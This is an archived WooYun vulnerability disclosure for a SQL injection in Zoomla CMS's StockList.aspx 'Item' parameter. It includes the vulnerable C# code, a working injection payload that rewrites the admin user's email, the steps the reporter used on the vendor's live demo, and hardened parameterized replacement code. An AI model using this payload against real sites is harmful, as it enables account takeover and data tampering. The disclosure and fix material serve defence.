WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2014-05-15: Details reported to the vendor, awaiting vendor handling
2014-05-20: Vendor proactively ignored the vulnerability; details opened to third-party security partners
2014-07-14: Details disclosed to core white hats and experts in related fields
2014-07-24: Details disclosed to regular white hats
2014-08-03: Details disclosed to intern white hats
2014-08-10: Details disclosed to the public
Well, the last submission was ignored outright, so the only option left was to test against the official demo. Note also that this hole has existed since 2008.
The problem is in the update-type file /user/usershop/StockList.aspx; the problematic parameter is Item. The problem code is as follows:
protected void Button3_Click(object sender, EventArgs e)
{
    // Comma-joined values of every checked "Item" box, taken from the form without validation
    string text = base.Request.Form["Item"];
    if (!string.IsNullOrEmpty(text) && this.bll.delstock(text)) // <-- here: raw user input handed to delstock
    {
        base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>");
        return;
    }
    base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>");
}

public bool delstock(string str)
{
    // str is concatenated straight into the DELETE statement: SQL injection
    string strSql = "delete from ZL_UserStock where (id in (" + str + "))";
    return SqlHelper.ExecuteSql(strSql, null);
}
Construct the parameter:
0))update ZL_User set Email='wooyun' where username='admin'-- // modifies the user's email; presumably this could be changed to modify the administrator's password instead
Procedure: after logging in, visit http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111 and use Firebug to modify the page's <table> content. Screenshot:
Content as follows:
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border">
  <tbody>
    <tr align="center" style="background:#FFBD59">
      <td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td>
      <td width="13%" class="title">单据类型</td>
      <td width="20%" class="title">单据编号</td>
      <td width="15%" class="title"> 录入时间</td>
      <td width="12%" class="title"> 录入者</td>
      <td width="20%" class="title"> 备注</td>
      <td width="15%" class="title"> 操作</td>
    </tr>
    <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
      <td height="22" align="center"><input type="checkbox" value="3" name="Item"></td>
      <td height="22" align="center">出库</td>
      <td height="22" align="center">订单</td>
      <td height="22" align="center">2014/5/14 21:54:09</td>
      <td height="22" align="center">admin</td>
      <td height="22" align="center">好家伙</td>
      <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=3">删除</a></td>
    </tr>
    <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
      <td height="22" align="center"><input type="checkbox" value="2" name="Item"></td>
      <td height="22" align="center">出库</td>
      <td height="22" align="center">订单</td>
      <td height="22" align="center">2014/5/14 21:54:09</td>
      <td height="22" align="center">admin</td>
      <td height="22" align="center">好家伙</td>
      <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=2">删除</a></td>
    </tr>
    <tr class="tdbg">
      <td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录
        <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">首页</a></span>
        <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">上一页</a></span>
        <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">下一页</a></span>
        <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">尾页</a></span>
        页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页
        转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1"> <option value="1">1</option></select>页</td>
    </tr>
  </tbody>
</table>
Change the value of the checkbox.
Then click the delete button.
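The root cause above is that delstock() concatenates the form value into the DELETE statement, and the multi-checkbox form relies on that concatenation (ASP.NET's Request.Form joins repeated "Item" values with commas, which is why "id in (...)" works). A hardened replacement, added here as an example and not Zoomla's own code: it rejects anything that is not a comma-separated list of positive integers before any SQL is built, binds each id as a SqlParameter, and scopes the delete to the logged-in user. The connection string connStr and the ownership column UserID on ZL_UserStock are assumptions; the report's SQL shows only the id column.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Linq;
using System.Text;

// Added example, not the project's code. Assumes ZL_UserStock has an integer
// primary key "id" (as in the report's SQL) and an owner column "UserID" (assumed).
public static class StockDeleter
{
    // Parse the comma-joined Item values into integers. Any non-numeric part,
    // such as the report's "0))update ZL_User ..." payload, fails here and the
    // whole request is refused, so no SQL is ever assembled from it.
    public static bool TryParseIds(string raw, out List<int> ids)
    {
        ids = new List<int>();
        if (string.IsNullOrWhiteSpace(raw)) return false;
        foreach (string part in raw.Split(','))
        {
            int id;
            if (!int.TryParse(part.Trim(), out id) || id <= 0)
            {
                ids.Clear();
                return false;
            }
            ids.Add(id);
        }
        return ids.Count > 0;
    }

    // Delete the selected rows, but only those owned by the current user.
    // The ids travel as parameters (@id0, @id1, ...), never as SQL text.
    // Returns the number of rows actually deleted.
    public static int DeleteStock(string connStr, int ownerUserId, string rawItems)
    {
        List<int> ids;
        if (!TryParseIds(rawItems, out ids)) return 0;

        var sql = new StringBuilder("DELETE FROM ZL_UserStock WHERE UserID = @uid AND id IN (");
        sql.Append(string.Join(",", ids.Select((_, i) => "@id" + i)));
        sql.Append(")");

        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql.ToString(), conn))
        {
            cmd.Parameters.Add("@uid", SqlDbType.Int).Value = ownerUserId;
            for (int i = 0; i < ids.Count; i++)
                cmd.Parameters.Add("@id" + i, SqlDbType.Int).Value = ids[i];
            conn.Open();
            return cmd.ExecuteNonQuery();
        }
    }
}
```

In the page's Button3_Click this replaces the `this.bll.delstock(text)` call with `StockDeleter.DeleteStock(connStr, currentUserId, text) > 0`, where currentUserId comes from the authenticated session (assumed). The owner check matters independently of the injection: without it, a valid list of ids still lets any logged-in shop user delete other users' stock records.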
The locally downloaded CMS2 V1.3, V1.4, V1.5 and CMS6.0 are all affected. Also, judging from the earliest file, this hole has existed since 2008.
Fix: get a programmer on it.
Severity: no impact (vendor ignored)
Ignored on: 2014-08-10 11:50
None